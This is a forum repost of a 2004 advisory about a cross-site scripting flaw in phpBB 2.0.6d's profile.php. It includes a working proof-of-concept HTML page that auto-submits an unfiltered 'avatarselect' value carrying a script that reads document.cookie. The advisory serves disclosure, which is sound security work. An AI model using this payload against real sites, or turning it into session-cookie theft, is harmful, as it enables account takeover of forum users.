phpBB profile.php Cross Site Scripting Vulnerability

serverplan · #1 (**permalink**) 22-03-2004, 21.10.41

################################################## ###################

Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability
Release Date : Mar 21,2004
Application : phpBB
Version : phpBB 2.0.6d or others?
Platform : PHP
Vendor URL : http://www.phpbb.com/
Author : Cheng Peng Su(apple_soup_at_msn.com)

################################################## ###################

Proof of Conecpt:

This vuln is in profile.php,when you click [Show Gallery],phpBB
will show you Avatar gallery,asking you to choose one for yourself.
The hole is in the form,after submitting phpBB will use the value of
"avatarselect" as the path of the gallery directly,without filtering
any illegal characters.

Exploit:

-------------exploit.htm--------------
<form name='f' action="http://site/profile.php?mode=editprofile" method="post">
<input name="avatarselect" value='" ><script>alert(document.cookie)</script>'>
<input type="submit" name="submitavatar" value="Select avatar">
</form>
<script>
window.onload=function()
{
document.all.submitavatar.click();
}
</script>
---------------end-------------------

Contact:

Cheng Peng Su
Class 1,Senior 2,High school attached to Wuhan University
Wuhan,Hubei,China(430072)
apple_soup_at_msn.com

Strumenti discussione
Visualizza versione stampabile Invia questa pagina via e-mail
Modalità visualizzazione
Modalità lineare Modalità ibrida Modalità elencata

Discussioni simili
Discussione	Autore discussione	Forum	Risposte	Ultimo messaggio
phyton e ssh per google site maps generator	mjfan80	CGI - PERL - SCRIPT	1	31-01-2006 16.16.39
New phpBB ViewTopic.php Cross Site Scripting	serverplan	Vulnerabilità	0	29-02-2004 01.44.34
Possible Cross Site Scripting in Discuz! Board	serverplan	Vulnerabilità	0	07-02-2004 10.43.07
CSS Vulnerability in Web Froums Server 1.6	serverplan	Vulnerabilità	0	05-02-2004 13.07.44
rxgoogle.cgi XSS Vulnerability	serverplan	Vulnerabilità	0	05-02-2004 13.07.06